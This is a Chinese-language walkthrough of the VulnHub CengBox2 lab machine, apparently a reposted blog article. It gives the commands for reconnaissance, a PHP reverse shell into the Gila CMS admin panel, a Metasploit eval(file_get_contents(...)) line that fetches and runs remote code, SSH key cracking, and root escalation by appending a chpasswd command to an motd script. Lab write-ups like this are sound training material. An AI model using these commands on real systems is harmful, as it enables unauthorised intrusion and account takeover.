vulnhub之CengBox2的实践

admin 2022年12月4日21:22:52安全文章评论16 views1799字阅读5分59秒阅读模式

今天实践的是vulnhub的CengBox2镜像,

下载地址,https://download.vulnhub.com/cengbox/CengBox2.ova,

先是用workstation导入,做地址扫描没扫到地址,

于是又用virtualbox导入,重新做地址扫描,

sudo netdiscover -r 192.168.1.0/24,这回有地址了,108就是,

vulnhub之CengBox2的实践

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.108,

vulnhub之CengBox2的实践

有可匿名登录的ftp服务,获取到note.txt,

进一步获取到用户名Kevin和域名ceng-company.vm,

vulnhub之CengBox2的实践

kali攻击机上添加静态域名解析,vim /etc/hosts,

192.168.1.108       ceng-company.vm,

对http服务做虚拟主机扫描,

gobuster vhost --append-domain -u ceng-company.vm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt,

获取到域名,admin.ceng-company.vm,

vulnhub之CengBox2的实践

继续做目录扫描,

gobuster dir -u http://admin.ceng-company.vm -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt,

获取到http://admin.ceng-company.vm/gila,

vulnhub之CengBox2的实践

进一步做目录扫描,获取到http://admin.ceng-company.vm/gila/admin,

vulnhub之CengBox2的实践

浏览器访问,

vulnhub之CengBox2的实践

猜测出来的用户名密码,[email protected]/admin,

登录后找到一个可直接贴反弹shell代码的页面,

vulnhub之CengBox2的实践

直接用kali攻击机自带的反弹shell代码,

cat /usr/share/webshells/php/php-reverse-shell.php,

kali攻击机上开个反弹shell监听,nc -lvp 4444,浏览器访问,

http://admin.ceng-company.vm/gila/admin/fm?f=./config.php,

获取到反弹shell,不是root,

改成交互式shell,python3 -c 'import pty;pty.spawn("/bin/bash")',

sudo -l发现swartz可执行的程序,

执行sudo -u swartz /home/swartz/runphp.sh,

发现是个可执行php代码的shell,




vulnhub之CengBox2的实践

上metasploit,

use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 8888
exploit

vulnhub之CengBox2的实践

把生成的php脚本内容贴到之前获取到的php shell下执行,

eval(file_get_contents('http://192.168.1.109:8080/xPO0MYFN8pesij', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));

metasploit这边获取到新的反弹shell,

获取到mitnick用户的ssh私钥,

vulnhub之CengBox2的实践

在kali攻击机这边对ssh的私钥进行口令暴破,

ssh2john key > hash,
john --wordlist=/usr/share/wordlists/rockyou.txt hash,

获取到口令,legend,

vulnhub之CengBox2的实践

在kali攻击机上ssh到靶机,

chmod 600 key,
ssh -i key [email protected]

不是root,需要继续提权,

vulnhub之CengBox2的实践

利用motd,

cd /etc/update-motd.d/,

echo "echo 'root:admin'|sudo chpasswd">>00-header,

退出ssh,再重新登录,切到root,id确认没问题,

vulnhub之CengBox2的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之CengBox2的实践

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月4日21:22:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  vulnhub之CengBox2的实践 https://cn-sec.com/archives/1444817.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: